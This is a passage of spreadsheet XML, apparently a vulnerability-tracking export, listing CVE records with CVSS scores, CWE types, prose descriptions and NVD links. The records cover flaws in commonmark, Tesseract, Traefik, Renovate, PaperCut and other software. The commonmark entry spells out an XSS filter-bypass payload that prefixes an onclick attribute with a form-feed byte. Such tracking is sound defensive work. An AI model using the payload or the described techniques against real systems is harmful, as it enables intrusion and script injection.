          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I3676" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3676" s="5" t="inlineStr"/>
      <c r="K3676" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3676" s="5" t="inlineStr">
        <is>
          <t>league/commonmark (thephpleague/commonmark) versions &gt;= 2.7.0 and &lt; 2.9.1 contain a cross-site scripting vulnerability in the AttributesExtension. Prefixing an attribute name with a single U+000C form feed byte (e.g. {\x0Conclick="alert(1)"}) bypasses the AttributesHelper::filterAttributes() 'on*' event-handler filter because PHP's trim() does not strip U+000C, causing the attribute to be written verbatim into the output where browsers parse it as a genuine event handler. The same prefix also defeats the allow_unsafe_links check, allowing javascript: URIs through href/src attributes even when allow_unsafe_links is false. Exploitation requires processing untrusted Markdown with the AttributesExtension enabled; the injected script executes when the rendered HTML is viewed. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="M3676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86431</t>
        </is>
      </c>
    </row>
    <row r="3677">
      <c r="A3677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86432</t>
        </is>
      </c>
      <c r="C3677" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3677" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3677" s="5" t="inlineStr"/>
      <c r="F3677" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3677" s="5" t="inlineStr"/>
      <c r="H3677" s="5" t="inlineStr"/>
      <c r="I3677" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3677" s="5" t="inlineStr"/>
      <c r="K3677" s="5" t="inlineStr">
        <is>
          <t>CWE-405</t>
        </is>
      </c>
      <c r="L3677" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 2.0.0 before 2.8.4 contain a denial of service vulnerability in XmlRenderer that emits depth-proportional indentation for every XML tag. Attackers can provide deeply nested Markdown or AST structures to cause quadratic memory consumption and output amplification, exhausting server resources.</t>
        </is>
      </c>
      <c r="M3677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86432</t>
        </is>
      </c>
    </row>
    <row r="3678">
      <c r="A3678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86539</t>
        </is>
      </c>
      <c r="C3678" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3678" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3678" s="5" t="inlineStr"/>
      <c r="F3678" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3678" s="5" t="inlineStr"/>
      <c r="H3678" s="5" t="inlineStr"/>
      <c r="I3678" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3678" s="5" t="inlineStr"/>
      <c r="K3678" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3678" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 contains a server-side request forgery vulnerability in the POST /api/embedding-models/test endpoint that issues outbound requests to caller-supplied destinations without validation. Attackers can enumerate internal hosts and cloud metadata endpoints by observing transport error messages that reveal network reachability information.</t>
        </is>
      </c>
      <c r="M3678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86539</t>
        </is>
      </c>
    </row>
    <row r="3679">
      <c r="A3679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86547</t>
        </is>
      </c>
      <c r="C3679" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3679" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3679" s="5" t="inlineStr"/>
      <c r="F3679" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3679" s="5" t="inlineStr"/>
      <c r="H3679" s="5" t="inlineStr"/>
      <c r="I3679" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3679" s="5" t="inlineStr"/>
      <c r="K3679" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3679" s="5" t="inlineStr">
        <is>
          <t>mrubyc through 4.0.0 contains a null pointer dereference vulnerability in the op_enter() handler in src/vm.c when processing untrusted bytecode. Attackers can craft malicious .mrb bytecode files with OP_ENTER instructions at the top level to crash the embedding application and cause denial of service.</t>
        </is>
      </c>
      <c r="M3679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86547</t>
        </is>
      </c>
    </row>
    <row r="3680">
      <c r="A3680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86748</t>
        </is>
      </c>
      <c r="C3680" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3680" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3680" s="5" t="inlineStr"/>
      <c r="F3680" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3680" s="5" t="inlineStr"/>
      <c r="H3680" s="5" t="inlineStr"/>
      <c r="I3680" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3680" s="5" t="inlineStr"/>
      <c r="K3680" s="5" t="inlineStr">
        <is>
          <t>CWE-460</t>
        </is>
      </c>
      <c r="L3680" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 wipe the database before validating the uploaded backup archive in the restore endpoint. Superusers uploading corrupted or invalid zip files trigger permanent data loss with no recovery path or rollback mechanism.</t>
        </is>
      </c>
      <c r="M3680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86748</t>
        </is>
      </c>
    </row>
    <row r="3681">
      <c r="A3681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86777</t>
        </is>
      </c>
      <c r="C3681" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3681" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3681" s="5" t="inlineStr"/>
      <c r="F3681" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3681" s="5" t="inlineStr"/>
      <c r="H3681" s="5" t="inlineStr"/>
      <c r="I3681" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3681" s="5" t="inlineStr"/>
      <c r="K3681" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3681" s="5" t="inlineStr">
        <is>
          <t>AlchemyCMS versions before 7.4.16 and 8.x before 8.3.6 fail to authorize access to the GET /api/nodes endpoint, allowing unauthenticated attackers to retrieve all navigation nodes. Attackers can access the endpoint without authentication to disclose restricted page names, URL paths, and internal URLs from all sites and languages.</t>
        </is>
      </c>
      <c r="M3681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86777</t>
        </is>
      </c>
    </row>
    <row r="3682">
      <c r="A3682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86804</t>
        </is>
      </c>
      <c r="C3682" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3682" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3682" s="5" t="inlineStr"/>
      <c r="F3682" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3682" s="5" t="inlineStr"/>
      <c r="H3682" s="5" t="inlineStr"/>
      <c r="I3682" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3682" s="5" t="inlineStr"/>
      <c r="K3682" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-285</t>
        </is>
      </c>
      <c r="L3682" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in seakee CPA-Manager-Plus up to 1.11.10. This vulnerability affects the function CPAResource of the file apps/manager-server/internal/http/controller/proxy/handler.go of the component HTTP Handler. The manipulation leads to improper authorization. It is possible to initiate the attack remotely. Upgrading to version 1.11.11 is able to resolve this issue. The identifier of the patch is 842eec791377ddcbea5cd639bc065eaa4801d656. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="M3682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86804</t>
        </is>
      </c>
    </row>
    <row r="3683">
      <c r="A3683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86806</t>
        </is>
      </c>
      <c r="C3683" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3683" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3683" s="5" t="inlineStr"/>
      <c r="F3683" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3683" s="5" t="inlineStr"/>
      <c r="H3683" s="5" t="inlineStr"/>
      <c r="I3683" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3683" s="5" t="inlineStr"/>
      <c r="K3683" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3683" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in opengeos GeoLibre up to 2.3.0. Impacted is the function _is_within_roots. This manipulation causes server-side request forgery. The attack can be initiated remotely. Upgrading to version 2.4.0 is recommended to address this issue. Patch name: b745f62e29fa37364686525a21eee5e5c0f8a369. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="M3683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t>
        </is>
      </c>
    </row>
    <row r="3684">
      <c r="A3684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86810</t>
        </is>
      </c>
      <c r="C3684" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3684" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3684" s="5" t="inlineStr"/>
      <c r="F3684" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3684" s="5" t="inlineStr"/>
      <c r="H3684" s="5" t="inlineStr"/>
      <c r="I3684" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3684" s="5" t="inlineStr"/>
      <c r="K3684" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L3684" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Open-Web-Analytics up to 1.9.1. The impacted element is the function checkCapabilityAndAuthenticateUser of the file Core/Controller.php of the component Controller. Performing a manipulation results in improper authentication. The attack may be initiated remotely. Upgrading to version 1.10.0 is sufficient to resolve this issue. The patch is named 6fc91c49eebdb8bfdfeed71cb50a5d97eac70f24. It is advisable to upgrade the affected component.</t>
        </is>
      </c>
      <c r="M3684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86810</t>
        </is>
      </c>
    </row>
    <row r="3685">
      <c r="A3685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8712</t>
        </is>
      </c>
      <c r="C3685" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3685" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3685" s="5" t="inlineStr"/>
      <c r="F3685" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3685" s="5" t="inlineStr"/>
      <c r="H3685" s="5" t="inlineStr"/>
      <c r="I3685" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3685" s="5" t="inlineStr"/>
      <c r="K3685" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3685" s="5" t="inlineStr">
        <is>
          <t>Wyoming before 1.10.2 contains a server-side request forgery vulnerability that allows unauthenticated attackers with network access to force outbound connections to arbitrary targets by supplying a malicious `uri` query parameter to the HTTP API. Attackers can pass arbitrary `tcp://` or `unix://` URIs to affected endpoints including /api/info, /api/speech-to-text, and /api/text-to-speech to override the server-configured backend and redirect connections to attacker-chosen hosts.</t>
        </is>
      </c>
      <c r="M3685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8712</t>
        </is>
      </c>
    </row>
    <row r="3686">
      <c r="A3686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87727</t>
        </is>
      </c>
      <c r="C3686" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3686" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3686" s="5" t="inlineStr"/>
      <c r="F3686" s="5" t="inlineStr"/>
      <c r="G3686" s="5" t="inlineStr"/>
      <c r="H3686" s="5" t="inlineStr"/>
      <c r="I3686" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3686" s="5" t="inlineStr"/>
      <c r="K3686" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3686" s="5" t="inlineStr">
        <is>
          <t>a-blog cms Ver. 3.2.33 and earlier contains a path traversal vulnerability, which allows an unauthenticated attacker to read or delete arbitrary files on the affected product.</t>
        </is>
      </c>
      <c r="M3686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87727</t>
        </is>
      </c>
    </row>
    <row r="3687">
      <c r="A3687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87747</t>
        </is>
      </c>
      <c r="C3687" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3687" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3687" s="5" t="inlineStr"/>
      <c r="F3687" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3687" s="5" t="inlineStr"/>
      <c r="H3687" s="5" t="inlineStr"/>
      <c r="I3687" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3687" s="5" t="inlineStr"/>
      <c r="K3687" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L3687" s="5" t="inlineStr">
        <is>
          <t>The Enterprise Cloud Database developed by Ragic has an Arbitrary File Read vulnerability. Privileged remote attackers can exploit Relative Path Traversal to download arbitrary system files.</t>
        </is>
      </c>
      <c r="M3687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87747</t>
        </is>
      </c>
    </row>
    <row r="3688">
      <c r="A3688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87810</t>
        </is>
      </c>
      <c r="C3688" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3688" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3688" s="5" t="inlineStr"/>
      <c r="F3688" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3688" s="5" t="inlineStr"/>
      <c r="H3688" s="5" t="inlineStr"/>
      <c r="I3688" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3688" s="5" t="inlineStr"/>
      <c r="K3688" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3688" s="5" t="inlineStr">
        <is>
          <t>Siyuan before v3.8.2 contains an information disclosure vulnerability in the POST /api/search/fullTextSearchBlock endpoint that filters private blocks from results but returns unfiltered match counts. Unauthenticated publish-mode readers can submit arbitrary search terms to learn whether matching content exists in hidden or unpublished documents and determine the number of matching blocks and pages.</t>
        </is>
      </c>
      <c r="M3688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87810</t>
        </is>
      </c>
    </row>
    <row r="3689">
      <c r="A3689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87820</t>
        </is>
      </c>
      <c r="C3689" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3689" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3689" s="5" t="inlineStr"/>
      <c r="F3689" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3689" s="5" t="inlineStr"/>
      <c r="H3689" s="5" t="inlineStr"/>
      <c r="I3689" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3689" s="5" t="inlineStr"/>
      <c r="K3689" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3689" s="5" t="inlineStr">
        <is>
          <t>CyberPanel versions 2.4.3 through 2.4.5 expose unauthenticated AI Scanner debugging endpoints that disclose administrator usernames, API-key prefixes, scan identifiers, target domains, and account metadata. Unauthenticated attackers can enumerate panel administrators and recent scanner activity to inventory multi-tenant installations and facilitate follow-on attacks.</t>
        </is>
      </c>
      <c r="M3689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87820</t>
        </is>
      </c>
    </row>
    <row r="3690">
      <c r="A3690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8793</t>
        </is>
      </c>
      <c r="C3690" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3690" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3690" s="5" t="inlineStr"/>
      <c r="F3690" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3690" s="5" t="inlineStr"/>
      <c r="H3690" s="5" t="inlineStr"/>
      <c r="I3690" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3690" s="5" t="inlineStr"/>
      <c r="K3690" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L3690" s="5" t="inlineStr">
        <is>
          <t>PaperCut NG/MF does not properly restrict excessive authentication attempts within its login component. An unauthenticated remote attacker can exploit this vulnerability to perform unrestricted brute-force or credential-stuffing attacks without triggering account lockout or rate-limiting mechanisms in some configurations.</t>
        </is>
      </c>
      <c r="M3690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8793</t>
        </is>
      </c>
    </row>
    <row r="3691">
      <c r="A3691" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8794</t>
        </is>
      </c>
      <c r="C3691" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3691" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3691" s="5" t="inlineStr"/>
      <c r="F3691" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3691" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H3691" s="5" t="inlineStr"/>
      <c r="I3691" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J3691" s="5" t="inlineStr"/>
      <c r="K3691" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="L3691" s="5" t="inlineStr">
        <is>
          <t>PaperCut NG/MF contains an observable timing discrepancy in its authentication component. An unauthenticated remote attacker can exploit this vulnerability to perform username enumeration by measuring response times during login attempts. The system executes a password hash comparison only when a valid account is supplied, creating a measurable timing oracle that reveals account existence.</t>
        </is>
      </c>
      <c r="M3691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8794</t>
        </is>
      </c>
    </row>
    <row r="3692">
      <c r="A3692" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88050</t>
        </is>
      </c>
      <c r="C3692" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3692" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3692" s="5" t="inlineStr"/>
      <c r="F3692" s="5" t="inlineStr"/>
      <c r="G3692" s="5" t="inlineStr"/>
      <c r="H3692" s="5" t="inlineStr"/>
      <c r="I3692" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3692" s="5" t="inlineStr"/>
      <c r="K3692" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L3692" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, RecodedCharID::DeSerialize in src/ccutil/unicharcompress.h validates length_ but accepts negative code_ values from a crafted .traineddata recoder component. UnicharCompress::ComputeCodeRange in src/ccutil/unicharcompress.cpp can consequently produce code_range_ equal to zero, after which SetupDecoder indexes is_valid_start_ with the negative code on a size-zero vector. The resulting out-of-bounds bit write uses a large wrapped index and reliably causes a wild-address crash or allocation failure on the default LSTM engine. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M3692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88050</t>
        </is>
      </c>
    </row>
    <row r="3693">
      <c r="A3693" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88054</t>
        </is>
      </c>
      <c r="C3693" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3693" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3693" s="5" t="inlineStr"/>
      <c r="F3693" s="5" t="inlineStr"/>
      <c r="G3693" s="5" t="inlineStr"/>
      <c r="H3693" s="5" t="inlineStr"/>
      <c r="I3693" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3693" s="5" t="inlineStr"/>
      <c r="K3693" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-824</t>
        </is>
      </c>
      <c r="L3693" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Plumbing::DeSerialize in src/lstm/plumbing.cpp rejects excessively large network stacks but accepts a zero-length stack for NT_SERIES, NT_PARALLEL, or NT_REVERSED layers in a crafted .traineddata model. During LSTMRecognizer initialization in src/lstm/lstmrecognizer.cpp, CacheXScaleFactor(XScaleFactor()) reaches Series::CacheXScaleFactor in src/lstm/series.cpp, which dereferences stack_[0] on the empty vector and invokes a virtual method through an invalid Network pointer. This causes a deterministic crash and denial of service at model load. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M3693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88054</t>
        </is>
      </c>
    </row>
    <row r="3694">
      <c r="A3694" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88878</t>
        </is>
      </c>
      <c r="C3694" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3694" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3694" s="5" t="inlineStr"/>
      <c r="F3694" s="5" t="inlineStr"/>
      <c r="G3694" s="5" t="inlineStr"/>
      <c r="H3694" s="5" t="inlineStr"/>
      <c r="I3694" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3694" s="5" t="inlineStr"/>
      <c r="K3694" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3694" s="5" t="inlineStr">
        <is>
          <t>Traefik is an HTTP reverse proxy and load balancer. In versions &gt;= v2.8.2 through &lt;= v2.11.55 and &gt;= v3.0.0 through &lt;= v3.7.11, the entryPoints.&lt;name&gt;.transport.respondingTimeouts settings — notably readTimeout, which is enabled by default at 60s — are not applied to the HTTP/3 request path. readTimeout is enforced as a deadline on the underlying TCP connection, which cannot be applied to a QUIC stream, and Traefik's HTTP/3 server is constructed without any timeout. As a result, on entry points with HTTP/3 enabled, an unauthenticated remote client that trickles request body bytes can hold a request open indefinitely and, with it, one upstream connection per request, exhausting bounded backend connection pools and causing denial of service. The issue was introduced in v2.8.2 when a quic-go API change removed the embedded http.Server that carried these timeouts. Fixed in v2.11.56 and v3.7.12.</t>
        </is>
      </c>
      <c r="M3694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88878</t>
        </is>
      </c>
    </row>
    <row r="3695">
      <c r="A3695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88884</t>
        </is>
      </c>
      <c r="C3695" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3695" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3695" s="5" t="inlineStr"/>
      <c r="F3695" s="5" t="inlineStr"/>
      <c r="G3695" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H3695" s="5" t="inlineStr"/>
      <c r="I3695" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3695" s="5" t="inlineStr"/>
      <c r="K3695" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3695" s="5" t="inlineStr">
        <is>
          <t>Renovate is a dependency update automation tool. In versions before 44.3.1 (and Mend Renovate CE/EE images before 15.4.0, mend-renovate-ce Helm chart before 15.4.0, mend-renovate-enterprise-edition Helm chart before 10.4.0), digest updates are not subject to the internal `minimumReleaseAge` (stability age) checks. When a repository configures `minimumReleaseAge` and has dependencies with `updateType=digest` — for example GitHub Actions pinned to a commit SHA with a floating tag, Docker images, Go modules or NuGet packages — Renovate will still open a pull request for a newly published digest, marked only with a pending `renovate/stability-days` status check. A newly published, potentially malicious dependency version can therefore cause a PR to be raised and CI workflows to potentially run before the configured minimum release age has elapsed, which is precisely what the Minimum Release Age control is intended to prevent. The issue is fixed in Renovate 44.3.1; as a workaround, digest updates can be disabled or gated behind `dependencyDashboardApproval`.</t>
        </is>
      </c>
      <c r="M3695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88884</t>
        </is>
      </c>
    </row>
    <row r="3696">
      <c r="A3696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88896</t>
        </is>
      </c>
      <c r="C3696" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3696" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3696" s="5" t="inlineStr"/>
      <c r="F3696" s="5" t="inlineStr"/>
      <c r="G3696" s="5" t="inlineStr"/>
      <c r="H3696" s="5" t="inlineStr"/>
      <c r="I3696" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3696" s="5" t="inlineStr"/>
      <c r="K3696" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3696" s="5" t="inlineStr">
        <is>
